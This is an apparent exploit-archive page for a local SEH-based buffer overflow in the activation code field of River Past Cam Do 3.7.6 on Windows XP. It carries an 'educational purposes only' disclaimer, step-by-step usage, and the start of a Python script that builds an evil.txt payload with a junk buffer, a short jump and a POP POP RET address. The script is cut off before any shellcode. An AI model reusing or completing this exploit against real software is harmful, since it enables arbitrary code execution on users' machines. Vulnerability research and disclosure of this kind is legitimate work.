River past cam do 3.7.6 activation code local buffer overflow Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-04-08 |
Type : local |
Platform : windows
This exploit / vulnerability River past cam do 3.7.6 activation code local buffer overflow is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python -w
#
# Exploit Author: Chris Au
# Exploit Title: River Past Cam Do 3.7.6 Local Buffer Overflow in Activation Code
# Date: 07-04-2019
# Vulnerable Software: River Past Cam Do 3.7.6
# Vendor Homepage: http://www.flexhex.com
# Version: 3.7.6
# Software Link: https://en.softonic.com/download/river-past-cam-do/windows/post-download?sl=1
# Tested Windows Windows XP SP3 EN
#
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open Cam Do
# 3. the application will ask you to input the activation code in order to activate it
# 4. paste contents from clipboard in the "Activation code"
# 5. select Activate
# 6. calc.exe
#
filename="evil.txt"
junk = "A" * 608
nseh = "\xeb\x09\x90\x90"
seh = "\x0e\x7d\x01\x10" ##pop pop ret rvddshow2.dll